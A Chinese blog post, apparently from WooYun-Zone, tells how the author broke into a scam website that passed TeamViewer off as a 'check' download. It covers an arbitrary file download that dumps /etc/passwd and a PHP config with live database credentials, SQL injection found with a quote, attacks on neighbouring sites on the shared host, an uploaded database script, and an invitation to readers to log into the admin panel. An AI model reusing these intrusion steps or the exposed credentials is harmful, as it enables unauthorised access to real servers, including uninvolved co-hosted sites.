揭秘道哥的黑板报里那个骗子网站 (WOOYUN)

  • A+
所属分类:WooYun-Zone

破落日 揭秘道哥的黑板报里那个骗子网站  (WOOYUN) | 2014-07-08 00:29

今晚道哥的黑板报的推送了一篇【同事亲历的一次电话诈骗】,挺有意思,没看过的同学可以看看涨姿势。

链接:点我!

里面附带了骗子的网址:http://sppcn010952110.com

那就来看看吧。

一看界面,煞有解释,应该是直接把官方的抓取过来了,但是左右两个链接异常可疑
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

左边的东西下载下来是一个Teamviewer。。。擦,远控啊= =,连图标也不改
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

仔细瞅瞅这链接:http://sppcn010952110.com/downloadfile.php?file=check.exe
果断任意文件下载:
得到一些儿信息
nobody:x:99:99:Nobody:/:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32009:32010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:498:498:MySQL server:/var/lib/mysql:/bin/bash
sppcncom:x:837:838::/home/sppcncom:/usr/local/cpanel/bin/noshell

<?    
$web_url = $_SERVER['PHP_SELF'];
$web_url = strrchr($web_url,"/");
$web_url = str_replace("/","",$web_url);
$web_domain = $_SERVER["HTTP_HOST"];
$host_url = "http://" . $web_domain;
//sppcntwd
$mysql_host_port = 'localhost:3306';
$mysql_user = 'sppcncom_a1';
$db_name = 'sppcncom_1';
$mysql_password = '2aqlpswko';

$connection = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");
$link = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");

$serverset = "character_set_connection='utf8', character_set_results='utf8', character_set_client='binary'";
mysql_query("SET $serverset");
mysql_select_db("$db_name") or die("Could not select database");

  
mysql_set_charset('utf8', $connection);

?>

再看看右边的,应该是查通缉令那个系统了:
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

随便输入个引号:
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)
恩。。注入

然后。。然后按照常理来说是扫扫后台吧。。。
恩。。扫不到。。= =
然后就旁注吧
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)
台湾友人的站,罪过罪过。。。

随便看了一个站,看到是蛋疼的linuxLinux sp18.g-dns.com 2.6.32-458.23.2.lve1.2.52.el6.x86_64 #1 SMP Mon Feb 3 06:07:54 EST 2014 x86_64(besttaiw)

结果找不到网站目录啊。。。估计是虚拟主机,我也懒得提权了。
最后丢了一个脚本上去看看数据库里都有啥
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)
这目测是钓鱼钓到的?看来已经有前辈日过了吧。。
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

这是后台的用户密码,扫到地址的同学可以登录上去玩玩~
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

我就看到这儿了,大家继续吧。。。
揭秘道哥的黑板报里那个骗子网站  (WOOYUN)

分享到: